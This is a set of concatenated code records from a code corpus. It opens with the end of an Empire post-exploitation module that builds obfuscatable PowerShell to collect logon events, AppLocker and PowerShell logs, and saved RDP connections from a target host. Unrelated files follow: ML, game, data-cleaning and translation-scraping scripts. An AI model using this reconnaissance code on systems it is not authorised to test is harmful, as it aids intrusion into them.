main_menu.modulesv2.finalize_module(\n script=script,\n script_end=script_end,\n obfuscate=obfuscate,\n obfuscation_command=obfuscation_command,\n )\n return script\n\n if option == \"AppLocker\":\n script_end += \"$AppLockerLogs = Find-AppLockerLogs;\"\n script_end += 'Write-Output \"AppLocker Process Starts:`n\";'\n script_end += \"Write-Output $AppLockerLogs.Values\"\n script_end += f\" | {outputf}\"\n script = main_menu.modulesv2.finalize_module(\n script=script,\n script_end=script_end,\n obfuscate=obfuscate,\n obfuscation_command=obfuscation_command,\n )\n return script\n\n if option == \"PSLogs\":\n script_end += \"$PSLogs = Find-PSScriptsInPSAppLog;\"\n script_end += 'Write-Output \"PowerShell Script Executions:`n\";'\n script_end += \"Write-Output $PSLogs.Values\"\n script_end += f\" | {outputf}\"\n script = main_menu.modulesv2.finalize_module(\n script=script,\n script_end=script_end,\n obfuscate=obfuscate,\n obfuscation_command=obfuscation_command,\n )\n return script\n\n if option == \"SavedRDP\":\n script_end += \"$RdpClientData = Find-RDPClientConnections;\"\n script_end += 'Write-Output \"RDP Client Data:`n\";'\n script_end += \"Write-Output $RdpClientData.Values\"\n script_end += f\" | {outputf}\"\n script = main_menu.modulesv2.finalize_module(\n script=script,\n script_end=script_end,\n obfuscate=obfuscate,\n obfuscation_command=obfuscation_command,\n )\n return script\n\n # if we get to this point, no switched were specified\n script_end += \"Get-ComputerDetails -Limit \" + str(params[\"Limit\"])\n if outputf == \"Out-String\":\n script_end += (\n \" -ToString | \"\n + '%{$_ + \"`n\"};\"`n'\n + str(module.name.split(\"/\")[-1])\n + ' completed!\"'\n )\n else:\n script_end += (\n f\" | {outputf} | \"\n + '%{$_ + \"`n\"};\"`n'\n + str(module.name.split(\"/\")[-1])\n + ' completed!\"'\n )\n\n script = main_menu.modulesv2.finalize_module(\n script=script,\n script_end=script_end,\n obfuscate=obfuscate,\n obfuscation_command=obfuscation_command,\n )\n return script\n","sub_path":"empire/server/modules/powershell/situational_awareness/host/computerdetails.py","file_name":"computerdetails.py","file_ext":"py","file_size_in_byte":5329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"428001088","text":"import os\nimport json\nimport numpy as np\nimport pickle as pkl\nfrom pathlib import Path\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.decomposition import PCA, TruncatedSVD, NMF, LatentDirichletAllocation\n\nclass Task1(object):\n def __init__(self, inputDir, k, vector_model, technique, out_dir=\"outputs\"):\n self.input_dir = os.path.abspath(inputDir)\n self.out_dir = os.path.join(out_dir, \"task1\")\n Path(self.out_dir).mkdir(parents=True, exist_ok=True)\n self.num_components = k\n self.vector_model = vector_model\n self.technique = technique\n self.file_vectors = []\n self.reduced_file_vectors = []\n self.output_filename = \"\"\n self.model = None\n self.word_indexes = self.get_word_indexes(\"all_words_idx.txt\")\n files = sorted([x.split(\".\")[0] for x in os.listdir(os.path.join(\"phase2_outputs\", \"task0a\")) if \".wrd\" in x])\n indices = list(range(0, len(files)))\n self.idx_file_map = dict(zip(indices, files))\n self.file_idx_map = dict(zip(files, indices))\n self.load_vectors()\n self.run_model()\n # self.write_outputs()\n self.write_task2_inputs()\n\n #Load vector index word mapping \n def get_word_indexes(self, indexFileName):\n tempIndexData = pkl.load(open(os.path.join(self.input_dir, 
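The four event-log branches in the module above differ only in the PowerShell snippet and its banner; a lookup table removes the duplicated finalize_module plumbing. This is a sketch only — the names mirror the module but it is not a tested refactor of Empire itself:

EVENT_SNIPPETS = {
    "4624": (
        "$SecurityLog = Get-EventLog -LogName Security; "
        "$Filtered4624 = Find-4624Logons $SecurityLog;"
        'Write-Output "Event ID 4624 (Logon):`n";'
        "Write-Output $Filtered4624.Values"
    ),
    "AppLocker": (
        "$AppLockerLogs = Find-AppLockerLogs;"
        'Write-Output "AppLocker Process Starts:`n";'
        "Write-Output $AppLockerLogs.Values"
    ),
}

def build_script_end(params, outputf="Out-String"):
    # first switch that is set wins, as in the original branch order
    for option, value in params.items():
        snippet = EVENT_SNIPPETS.get(option)
        if snippet and value:
            return f"{snippet} | {outputf}"
    return None

assert build_script_end({"AppLocker": "True"}).endswith(" | Out-String")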
indexFileName), 'rb'))\n return {tempIndexData[i]:i for i in tempIndexData} # reversing key/values\n \n #Load TF and TF-IDF vectors for each file\n def load_vectors(self):\n self.vector_file_prefix = \"tf_vectors_\" if self.vector_model==1 else \"tfidf_vectors_\"\n \n vectors = {}\n for fileName in os.listdir(self.input_dir):\n if(fileName.startswith(self.vector_file_prefix)):\n fileNumber = fileName.split('.')[0].split('_')[-1]\n with open(os.path.join(self.input_dir, fileName), 'r') as f:\n vectors[fileNumber] = json.loads(json.load(f))\n\n self.file_vectors = np.array([vectors[key] for key in sorted(vectors)])\n \n #Running feature reduction\n def run_model(self):\n #Choose model based on user option\n if self.technique==1:\n self.output_filename = \"pca_{}_{}.txt\".format(self.vector_model, self.num_components)\n self.model = PCA(n_components=self.num_components)\n elif self.technique==2:\n self.output_filename = \"svd_{}_{}.txt\".format(self.vector_model, self.num_components)\n self.model = TruncatedSVD(n_components=self.num_components)\n elif self.technique==3:\n self.output_filename = \"nmf_{}_{}.txt\".format(self.vector_model, self.num_components)\n self.model = NMF(n_components=self.num_components, max_iter=500)\n else:\n self.output_filename = \"lda_{}_{}.txt\".format(self.vector_model, self.num_components)\n self.model = LatentDirichletAllocation(n_components=self.num_components)\n\n # scaler = MinMaxScaler()\n # self.file_vectors = scaler.fit_transform(self.file_vectors)\n self.reduced_file_vectors = self.model.fit_transform(self.file_vectors)\n \n #Writing results as pairs \n def write_outputs(self):\n name = self.output_filename.split(\"_\")[0] + \"_{}_vectors.txt\".format(self.vector_model)\n json.dump(json.dumps(self.reduced_file_vectors.tolist()), open(os.path.join(self.out_dir, name), \"w\"))\n with open(os.path.join(self.out_dir, self.output_filename), \"w+\") as f:\n f.write(\"[\")\n for topic in self.model.components_:\n f.write(\"{\")\n for idx in np.argsort(topic)[::-1]:\n originalWord = self.word_indexes[idx]\n score = topic[idx]\n f.write(\"{}:{},\".format(originalWord, score))\n f.write('},\\n')\n f.write(\"]\")\n\n\n #Write reduced dimensional data\n def write_task2_inputs(self):\n name = self.output_filename.split(\"_\")[0] + \"_{}_vectors.txt\".format(self.vector_model)\n json.dump(json.dumps(self.reduced_file_vectors.tolist()), open(os.path.join(self.out_dir, name), \"w\"))\n\n\nif __name__==\"__main__\":\n inputDir = input(\"Enter the directory to use: \")\n numComponents = int(input(\"Enter number of components (k): \"))\n vectorModel = int(input(\"Enter vector model (1-TF, 2-TFIDF): \"))\n technique = int(input(\"Enter model to use (1-PCA, 2-SVD, 3-NMF, 4-LDA): \"))\n t1 = Task1(inputDir, numComponents, vectorModel, technique)","sub_path":"Phase-3/phase2/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":4526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"325286904","text":"from ..xmlUtil import *\nfrom ..ActionEffect import ActionEffect\nfrom ..LangText import LangText\n\nclass DisplayNodeTextEffect(ActionEffect):\n\tdef __init__(self, xml = None):\n\t\tif xml != None:\n\t\t\t# this effect has type in the attributes, and nothing else.\n\t\t\tvalidateNoChildren(xml)\n\t\t\tvalidateAttributes(xml, ['type'], [])\n\t\t\tvalidateNoTail(xml)\n\t\t\tvalidateNoBody(xml)\n\t\n\tdef execute(self, 
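run_model() above selects one of four estimators with an if/elif chain; since the only differences are the constructor and the filename prefix, a dispatch table keyed by the same menu numbers is tidier. A sketch using the same sklearn classes:

from sklearn.decomposition import PCA, TruncatedSVD, NMF, LatentDirichletAllocation

REDUCERS = {
    1: ("pca", PCA),
    2: ("svd", TruncatedSVD),
    3: ("nmf", lambda n_components: NMF(n_components=n_components, max_iter=500)),
    4: ("lda", LatentDirichletAllocation),
}

def make_reducer(technique: int, k: int):
    name, ctor = REDUCERS[technique]
    return name, ctor(n_components=k)

name, model = make_reducer(2, 10)
assert name == "svd" and model.n_components == 10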
character):\n\t\tcharacter.sendLangTextToController(character.getNodeLangText())\n\t","sub_path":"dirt/effects/DisplayNodeTextEffect.py","file_name":"DisplayNodeTextEffect.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"192489986","text":"import lib.utility as utility\nfrom lib.interpreters.command import Command\nfrom lib.interpreters.constants import Position, Range\nfrom comm import Yell\nimport lib.combat as combat\n\n\n\"\"\"\nCommand Attributes;\nattribute (default): description\n\naggro\t\t\t\t(False)\t\t\t\t: does it start combat?\ncanTarget\t\t\t(False)\t\t\t\t: can it take an automatic single target?\nrequireTarget\t\t(False)\t\t\t\t: does it require a target?\nuseInCombat\t\t\t(False)\t\t\t\t: can you use it in combat?\nuseWhileJustDied\t(True)\t\t\t\t: can you use it immediately after dying?\ntargetSelf\t\t\t(True)\t\t\t\t: can you target yourself?\nRange\t\t\t\t(Range.room)\t\t: for skills that canTarget, what is the range of potential targets?\nminPosition\t\t\t(Position.standing)\t: what is the minimum position as defined in constants.py?\n\"\"\"\n\n\nclass Flee(Command):\n\tdef __init__(self, game):\n\t\tsuper(Flee, self).__init__(game, 'flee')\n\t\tself.minPosition = Position.fighting\n\t\tself.useInCombat = True\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\t\taggro = sender.combat\n\n\t\taggro.sendToClient('{name} has fled!'.format(name=sender.getName(aggro)))\n\t\tsender.sendToClient('You flee from combat!')\n\t\tsender.setLag(3)\n\t\tsender.combat = None\n\t\tsender.position = Position.standing\n\t\tif aggro.combat == sender:\n\t\t\taggro.combat = None\n\t\t\taggro.position = Position.standing\n\n\nclass Kill(Command):\n\tdef __init__(self, game):\n\t\tsuper(Kill, self).__init__(game, 'kill')\n\t\tself.canTarget = True\n\t\tself.requireTarget = True\n\t\tself.targetSelf = False\n\t\tself.useWhileJustDied = False\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\t\ttarget = config['target']\n\n\t\tsender.combat = target\n\t\tsender.position = Position.fighting\n\t\tsender.setLag(3)\n\t\tif target.combat is None:\n\t\t\ttarget.combat = sender\n\t\t\ttarget.position = Position.fighting\n\t\t\t# if target.client:\n\t\t\tyell = Yell(self.game)\n\t\t\tyell.execute(['Help! 
I am being attacked by {sender}!'.format(sender=sender.getName())], {'sender': target})\n\t\t\t# sender does one full round against target\n\t\t\tb2, target = combat.doCombat(sender)\n\n\t\t\tsender.sendToBuffer(b2['sender'].format(target=target.getName(sender)))\n\t\t\ttarget.sendToBuffer(b2['target'].format(name=sender.getName(target)))\n\t\t\tsender.game.sendToBufferCondition(\n\t\t\t\t(lambda a: a.room == sender.room and a is not sender and a is not target), b2['room'], [sender, target])\n\n\t\t\tfor mobile in self.game.mobiles:\n\t\t\t\tif mobile.combatBuffer:\n\t\t\t\t\tmobile.appendEnemyConditionToBuffer()\n\t\t\t\t\tmobile.sendToClient(mobile.combatBuffer)\n\t\t\t\t\tmobile.clearBuffer()\n\n\nclass North(Command):\n\tdef __init__(self, game):\n\t\tsuper(North, self).__init__(game, 'north')\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\n\t\tmove(self.game, 'north', sender)\n\n\nclass South(Command):\n\tdef __init__(self, game):\n\t\tsuper(South, self).__init__(game, 'south')\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\n\t\tmove(self.game, 'south', sender)\n\n\nclass East(Command):\n\tdef __init__(self, game):\n\t\tsuper(East, self).__init__(game, 'east')\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\n\t\tmove(self.game, 'east', sender)\n\n\nclass West(Command):\n\tdef __init__(self, game):\n\t\tsuper(West, self).__init__(game, 'west')\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\n\t\tmove(self.game, 'west', sender)\n\n\nclass Up(Command):\n\tdef __init__(self, game):\n\t\tsuper(Up, self).__init__(game, 'up')\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\n\t\tmove(self.game, 'up', sender)\n\n\nclass Down(Command):\n\tdef __init__(self, game):\n\t\tsuper(Down, self).__init__(game, 'up')\n\n\tdef execute(self, args, config):\n\t\tsender = config['sender']\n\n\t\tmove(self.game, 'down', sender)\n\n\ndef move(game, direction, sender):\n\tnewRoom = next((exit.destination for exit in sender.room.exits if exit.key == direction), None)\n\tif newRoom:\n\t\toldRoom = sender.room\n\t\tsender.room = newRoom\n\t\tif not sender.isAffectedBy('sneak'):\n\t\t\tgame.sendCondition(\n\t\t\t\t(lambda a: a.room == oldRoom and a is not sender), '{{0}} leaves {direction}.'.format(direction=direction), [sender])\n\t\tbuf = 'You leave {direction}.'.format(name=sender.name, oldRoom=sender.room.name, newRoom=newRoom.name, direction=direction)\n\t\tsender.sendToClient(buf)\n\t\tif not sender.isAffectedBy('sneak'):\n\t\t\tgame.sendCondition((lambda a: a.room == newRoom and a is not sender), '{0} has arrived.', [sender])\n\t\tsender.setLag(1)\n\telse:\n\t\tsender.sendToClient('You can\\'t go that way.'.format(name=sender.name, oldRoom=sender.room.name, direction=direction))\n\ncommandList = [North, South, East, West, Up, Down, Kill, Flee]\n","sub_path":"lib/interpreters/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"321535749","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thur Dec 14 22:24:32 2017\n@description:\nAuthor disambiguation use the name and the affiliation of authors.\n\n@author: Lanry Fan\n\"\"\"\n\nimport pymysql\n\ndb=pymysql.connect('localhost','user','psw','dbname')\n'''\n#Step-1:Initial [aid_raw2] use [aid_raw]\ncursor_init=db.cursor()\nsql_init='update author_init set aid_raw2=aid_raw'\ntry:\n cursor_init.execute(sql_init)\n 
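move() above resolves a direction with the next(generator, default) idiom: the first matching exit wins, and an unknown direction falls through to None instead of raising StopIteration. The same pattern in isolation, with a made-up Exit class:

class Exit:
    def __init__(self, key, destination):
        self.key = key
        self.destination = destination

exits = [Exit("north", "Town Square"), Exit("east", "Gate")]

# first exit whose key matches, else None
dest = next((e.destination for e in exits if e.key == "east"), None)
assert dest == "Gate"
assert next((e.destination for e in exits if e.key == "down"), None) is None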
db.commit()\nexcept Exception as e0:\n print('e0:',e0)\n db.rollback()\n'''\n#step-2:Get lname list from [author_init]\ncursor=db.cursor()\nsql='select count(xuhao),lname from author_init group by lname'\n#用[fname,mname,fname_initial,mname_initial,affiliation]精确匹配\ndata=[]\ncounter=0\ntry:\n cursor.execute(sql)\n rs1=cursor.fetchall()\n for row in rs1:\n print('正在处理第',counter+1,'条姓名数据...')\n number=row[0]\n lname=row[1]\n #Step-3:Get the name information list use the lname\n cursor_disab=db.cursor()\n sql_disab='select xuhao,aid_raw2,fname,mname,fname_initial,mname_initial,\\\n affiliation from author_init\\\n where lname=\"%s\"' %(lname)\n try:\n cursor_disab.execute(sql_disab)\n rs2=cursor_disab.fetchall()\n lname=lname.replace('||','')\n data_disab=[]\n xuhao=0;aid=0;fname='';mname=''\n fname_ini='';mname_ini=''\n affiliation=''\n for row2 in rs2:\n xuhao=row2[0]\n aid=row2[1]\n fname=row2[2]\n mname=row2[3]\n fname_ini=row2[4]\n mname_ini=row2[5]\n affiliation=row2[6]\n if fname is None:\n fname=''\n if mname is None:\n mname=''\n if fname_ini is None:\n fname_ini=''\n if mname_ini is None:\n mname_ini=''\n if affiliation is None:\n affiliation=''\n removestr=['||','/','\\\\','[',']','\"',\"'\"]\n for rmstr in removestr:\n fname=fname.replace(rmstr,'')\n mname=mname.replace(rmstr,'')\n fname_ini=fname_ini.replace(rmstr,'')\n mname_ini=mname_ini.replace(rmstr,'')\n fname=fname.strip()\n mname=mname.strip()\n fname_ini=fname_ini.strip()\n mname_ini=mname_ini.strip()\n affiliation=affiliation.replace('.','').replace('&',' ')\n affiliation=affiliation.replace('||',' ').strip()\n affiliation=' '.join(affiliation.split())\n affiliation=affiliation.lower()\n data_disab.append([xuhao,aid,fname,mname,fname_ini,mname_ini,affiliation])\n length=len(data_disab)\n #Step-4:Author disambiguation\n #More than one record\n if length>1:\n for i in range(length-1):\n for j in range(i+1,length):\n #Only if the two have different aid,then decide disambiguation\n if data_disab[i][1]!=data_disab[j][1]:\n #If the two both have the [fname]\n if data_disab[i][2]!='' and data_disab[j][2]!='':\n #If the two both have the [mname],use[fname,mname]\n if data_disab[i][3]!='' and data_disab[j][3]!='':\n #If two [fname,mname] are the same\n if data_disab[i][2]==data_disab[j][2] and data_disab[i][3]==data_disab[j][3]:\n #IF two [affiliation] are the same,decide them as one author \n if data_disab[i][6]==data_disab[j][6]:\n aid1=data_disab[i][1]\n aid2=data_disab[j][1]\n minaid=min(aid1,aid2)\n for item in data_disab:\n if item[1]==aid1 or item[1]==aid2:\n item[1]=minaid\n else:\n pass\n #Either A or B haven't the [mname],use[fname]\n else:\n #If two [fname] are the same\n if data_disab[i][2]==data_disab[j][2]:\n #IF two [affiliation] are the same,decide them as one author \n if data_disab[i][6]==data_disab[j][6]:\n aid1=data_disab[i][1]\n aid2=data_disab[j][1]\n minaid=min(aid1,aid2)\n for item in data_disab:\n if item[1]==aid1 or item[1]==aid2:\n item[1]=minaid\n else:\n pass\n #Either A or B haven't the [fname]\n else:\n #If the two both have the [fname_ini]\n if data_disab[i][4]!='' and data_disab[j][4]!='':\n #If the two both have the [mname_ini],use[fname_ini,mname_ini]\n if data_disab[i][5]!='' and data_disab[j][5]!='':\n #If two [fname_ini,mname_ini] are the same\n if data_disab[i][4]==data_disab[j][4] and data_disab[i][5]==data_disab[j][5]:\n #IF two [affiliation] are the same,decide them as one author \n if data_disab[i][6]==data_disab[j][6]:\n aid1=data_disab[i][1]\n aid2=data_disab[j][1]\n 
minaid=min(aid1,aid2)\n for item in data_disab:\n if item[1]==aid1 or item[1]==aid2:\n item[1]=minaid\n else:\n pass\n #Either A or B haven't the [mname_ini],use[fname_ini]\n else:\n #If two [fname_ini] are the same\n if data_disab[i][4]==data_disab[j][4]:\n #IF two [affiliation] are the same,decide them as one author \n if data_disab[i][6]==data_disab[j][6]:\n aid1=data_disab[i][1]\n aid2=data_disab[j][1]\n minaid=min(aid1,aid2)\n for item in data_disab:\n if item[1]==aid1 or item[1]==aid2:\n item[1]=minaid\n else:\n pass\n #Either A or B haven't the [fname_ini],decide them as two individual authors\n else:\n pass \n for row3 in data_disab:\n data.append([row3[0],row3[1],row3[2],row3[3],row3[4],row3[5],row3[6]])\n #Only one record\n else:\n #data.append([xuhao,aid,fname,mname,fname_ini,mname_ini,affiliation])\n pass\n except Exception as e1:\n print('e1:',e1)\n counter+=1\nexcept Exception as e:\n print('e:',e)\n\nprint('数据处理完成,等待写入数据库...')\nlength_data=len(data)\ncounter1=0\ntry:\n for row in data:\n cursor_update=db.cursor()\n sql_update='update author_init set aid_raw2=%d\\\n where xuhao=%d' % (row[1],row[0])\n try:\n print('共',length_data,'条记录,正在插入第',counter1+1,'条记录...')\n cursor_update.execute(sql_update)\n db.commit()\n except Exception as e2:\n db.rollback()\n print('e2:',e2)\n counter1+=1\nexcept Exception as e0:\n print('e0:',e0)\n\nprint('第三轮匹配完成!')\ndb.close()\n","sub_path":"Author disambiguation/author_disambiguation3.py","file_name":"author_disambiguation3.py","file_ext":"py","file_size_in_byte":9064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509734858","text":"print(\"loading...\")\n\nimport random\n\nverb = (\"Tickles\", \"Eats\", \"Munches\", \"Punches\", \"Twists\", \"Shoots\", \"Beats\", \"Bends\", \"Bites\", \"Blows\", \"Breaks\", \"Builds\", \"Burns\", \"Catches\", \"Cuts\", \"Digs\", \"Dive\", \"Draws\", \"Dreams\", \"Feels\", \"Fights\", \"Freezes\", \"Grows\", \"Hangs\", \"Hears\", \"Hides\", \"Hurts\", \"Throws\")\nnoun = (\"School\", \"Face\", \"Arm\", \"Mouth\", \"Head\", \"Nose\", \"Foot\", \"People\", \"History\", \"Art\", \"World\", \"Map\", \"Family\", \"Government\", \"Health\", \"System\", \"Computer\", \"Music\", \"Person\", \"Method\", \"Food\", \"Bird\", \"Literature\", \"Problem\", \"Software\", \"Knowledge\", \"Brain\", \"Economy\", \"Oven\", \"Friends\")\n\ndef generate():\n return \"That really \"+random.choice(verb)+\" my \"+random.choice(noun)+\".\"\ndef generator():\n i = (input())\n\n if i==\"generate\":\n print(generate())\n elif i==\"lmao\":\n print(\"I know right im so random\")\n\n if i!=\"bye\":\n generator()\n else:\n print(\"Bye!\")\n\n\ndef generateList(amt):\n loop = 0\n while loop <= amt:\n print(str(loop)+\": \"+generate())\n loop += 1\n\nprint(\"done!\")\nprint(\"run generator() to start the generator, then type 'generate' to get a sentence. while in generate mode, type 'bye' to leave that mode. 
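The pairwise passes above merge authors by rewriting every matching record to the smaller aid, which is quadratic in group size and sensitive to comparison order. That merge is exactly what union-find does; a minimal sketch that keeps the smallest aid as the representative:

parent = {}

def find(a):
    parent.setdefault(a, a)
    while parent[a] != a:
        parent[a] = parent[parent[a]]   # path halving
        a = parent[a]
    return a

def union(a, b):
    ra, rb = find(a), find(b)
    parent[max(ra, rb)] = min(ra, rb)   # smaller aid stays the root

union(7, 3)
union(9, 7)
assert find(9) == find(3) == 3   # all three records share aid 3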
to generate a list exit generate mode if you're in it, then type generateList() with the amount you want inside the parentheses\")\n","sub_path":"Random.py","file_name":"Random.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"592895046","text":"import pygame\nfrom game_object import GameObject\n\n\nclass Player_checkers(GameObject):\n\n def __init__(self, x, y, r, color, check_type=\"ordinary\"):\n GameObject.__init__(self, x - r, y - r, r * 2, r * 2)\n self.radius = r\n self.diameter = r * 2\n self.color = color\n self.checkers_type = check_type\n\n def draw(self, surface):\n pygame.draw.circle(surface, self.color, self.center, self.radius)\n","sub_path":"Player_checkers.py","file_name":"Player_checkers.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"238276276","text":"from model.PNNet import Res_Generator as Generator\nfrom model.DC_descriminator import Discriminator as Discriminator\nfrom lib.dataset import Dataset, Person\nimport lib.move_util as move\nimport lib.data_generator as dg\nimport lib.prework as pre\nfrom model.metrics import ssim as ssim\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport cv2\nimport numpy as np\nimport numpy.random as rand\nimport pickle\nimport json\nimport os\n\ndef print_out():\n src_dir = '/home/dongkai/pzq/data/market-morph/'\n dst_dir = '/home/dongkai/pzq/data/market-refine/'\n pose_dir = '/home/dongkai/pzq/data/market-pose-map/'\n tgt_mask_dir = '/home/dongkai/pzq/data/market-mask/'\n tgt_dir = '/home/dongkai/pzq/data/market-gt/'\n image_list = os.listdir(src_dir)\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n network = Generator(64, 6).cuda()\n network.load_state_dict(torch.load('/home/dongkai/pzq/MVHS/base_model/G.pkl'))\n for param in network.parameters():\n param.requires_grad = False\n\n for i, image_name in enumerate(image_list):\n input = np.zeros((1, 4, 128, 64))\n img = np.transpose(cv2.imread(src_dir + image_name) / 255, (2, 0, 1))\n img_name = image_name[:-5] + '.jpg'\n pose = cv2.imread(pose_dir + img_name, 0) / 255\n mask = cv2.imread(tgt_mask_dir + img_name, 0) / 255\n tgt_img = np.transpose(cv2.imread(tgt_dir + img_name) / 255, (2, 0, 1))\n img = img * mask + tgt_img * (1 - mask)\n\n input[0, :3, :, :] = img\n input[0, 3, :, :] = pose\n input = torch.tensor(input).float().cuda()\n out = network(input)\n out = (np.array(out.detach().cpu()) * 255).astype(np.uint8)\n out = np.transpose(out[0], (1, 2, 0))\n cv2.imwrite(dst_dir + image_name, out)\n\n if i % 200 == 0:\n print(i)\n\ndef compute_ave_ssim():\n src_dir = '/home/dongkai/pzq/data/market-refine/'\n tgt_dir = '/home/dongkai/pzq/data/market-gt/'\n image_list = os.listdir(src_dir)\n image_list = sorted(image_list, key=lambda x:x)\n total_ssim = 0\n num = 2000\n test_list = np.arange(40000, 40000 + num)\n np.random.shuffle(test_list)\n\n img0 = np.zeros((num, 3, 128, 64))\n img1 = np.zeros((num, 3, 128, 64))\n for i in range(num):\n image_name = image_list[test_list[i]]\n img0[i] = np.transpose(cv2.imread(src_dir + image_name) / 255, (2, 0, 1))\n img1[i] = np.transpose(cv2.imread(tgt_dir + image_name[:-5] + '.jpg') / 255, (2, 0, 1))\n \n img0 = torch.tensor(img0).cuda()\n img1 = torch.tensor(img1).cuda()\n\n print('Start')\n\n for j in range(int(num / 2000)):\n total_ssim += ssim(img1[j*2000:(j+1)*2000], 
img0[j*2000:(j+1)*2000])\n\n print(total_ssim / (num / 2000))\n\n\ndef compute_max_ssim():\n src_dir = '/home/dongkai/pzq/data/market-refine/'\n tgt_dir = '/home/dongkai/pzq/data/market-gt/'\n image_list = os.listdir(src_dir)\n image_list = sorted(image_list, key=lambda x:x)\n total_ssim = 0\n num = 1000\n test_list = np.arange(20000, 20000 + num)\n np.random.shuffle(test_list)\n\n \n for i in range(num):\n img0 = np.zeros((2, 3, 128, 64))\n img1 = np.zeros((1, 3, 128, 64))\n image_name = image_list[test_list[i]][:-5]\n img1[0] = np.transpose(cv2.imread(tgt_dir + image_name + '.jpg') / 255, (2, 0, 1))\n for j in range(2):\n img_name = image_name + str(j) + '.jpg'\n img0[j, :, :, :] = np.transpose(cv2.imread(src_dir + img_name) / 255, (2, 0, 1))\n\n img1 = torch.tensor(img1).cuda().float()\n img0 = torch.tensor(img0).cuda().float()\n \n ssim0 = ssim(img1, img0[0:1, :, :, :])\n ssim1 = ssim(img1, img0[1:, :, :, :])\n total_ssim += torch.max(ssim0, ssim1)\n\n total_ssim = total_ssim / num\n\n print(total_ssim)\n\n\n\nif __name__ == '__main__':\n # print_out()\n compute_max_ssim()\n ","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"127627052","text":"# -*- coding:utf-8 -*-\nimport urllib\nimport urllib.request\nimport urllib.parse\nimport requests\nimport execjs # PyExecJS library\nimport re\nfrom wp_spider.translate.youdao import youdao\n\nclass translate_google():\n def __init__(self, word_limit=1000, dl_words=300):\n self.split_re = re.compile(r'|\n', re.I | re.S) # NOTE: the empty left alternative suggests an HTML tag (e.g. <br>) was lost during extraction\n self.sent_end = re.compile(r'([。.??!!;;])', re.I)\n self.word_limit = word_limit\n self.dl_words = dl_words\n\n # maps language names (written in Chinese) to Google language codes\n self.lan_dict = {\n '中文': 'zh-CN',\n '英文': 'en',\n '俄文': 'ru',\n '法文': 'fr',\n '日文': 'ja',\n '韩文': 'ko'\n }\n\n self.headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'}\n self.url = 'http://translate.google.cn/translate_a/single'\n self.session = requests.Session()\n self.session.keep_alive = False\n\n def getTk(self, text):\n return self.get_ctx().call(\"TL\", text)\n\n def get_ctx(self):\n ctx = execjs.compile(\"\"\" \n function TL(a) { \n var k = \"\"; \n var b = 406644; \n var b1 = 3293161072; \n var jd = \".\"; \n var $b = \"+-a^+6\"; \n var Zb = \"+-3^+b+-f\"; \n for (var e = [], f = 0, g = 0; g < a.length; g++) { \n var m = a.charCodeAt(g); \n 128 > m ? e[f++] = m : (2048 > m ? e[f++] = m >> 6 | 192 : (55296 == (m & 64512) && g + 1 < a.length && 56320 == (a.charCodeAt(g + 1) & 64512) ? (m = 65536 + ((m & 1023) << 10) + (a.charCodeAt(++g) & 1023), \n e[f++] = m >> 18 | 240, \n e[f++] = m >> 12 & 63 | 128) : e[f++] = m >> 12 | 224, \n e[f++] = m >> 6 & 63 | 128), \n e[f++] = m & 63 | 128) \n } \n a = b; \n for (f = 0; f < e.length; f++) a += e[f], \n a = RL(a, $b); \n a = RL(a, Zb); \n a ^= b1 || 0; \n 0 > a && (a = (a & 2147483647) + 2147483648); \n a %= 1E6; \n return a.toString() + jd + (a ^ b) \n }; \n function RL(a, b) { \n var t = \"a\"; \n var Yb = \"+\"; \n for (var c = 0; c < b.length - 2; c += 3) { \n var d = b.charAt(c + 2), \n d = d >= t ? d.charCodeAt(0) - 87 : Number(d), \n d = b.charAt(c + 1) == Yb ? a >>> d: a << d; \n a = b.charAt(c) == Yb ? a + d & 4294967295 : a ^ d \n } \n return a \n } \n \"\"\")\n return ctx\n\n def buildUrl(self, text, tk, sl, tl): # note: the sl argument is unused; the source language is hardcoded to auto\n baseUrl = 'http://translate.google.cn/translate_a/single'\n baseUrl += '?client=webapp&' # with client=webapp the translation quality is noticeably better; client=t translates rather poorly\n baseUrl += 'sl=auto&'\n baseUrl += 'tl=' + str(tl) + '&'\n baseUrl += 'hl=zh-CN&'\n baseUrl += 'dt=at&'\n baseUrl += 'dt=bd&'\n baseUrl += 'dt=ex&'\n baseUrl += 'dt=ld&'\n baseUrl += 'dt=md&'\n baseUrl += 'dt=qca&'\n baseUrl += 'dt=rw&'\n baseUrl += 'dt=rm&'\n baseUrl += 'dt=ss&'\n baseUrl += 'dt=t&'\n baseUrl += 'ie=UTF-8&'\n baseUrl += 'oe=UTF-8&'\n baseUrl += 'clearbtn=1&'\n baseUrl += 'otf=1&'\n baseUrl += 'pc=1&'\n baseUrl += 'srcrom=0&'\n baseUrl += 'ssel=0&'\n baseUrl += 'tsel=0&'\n 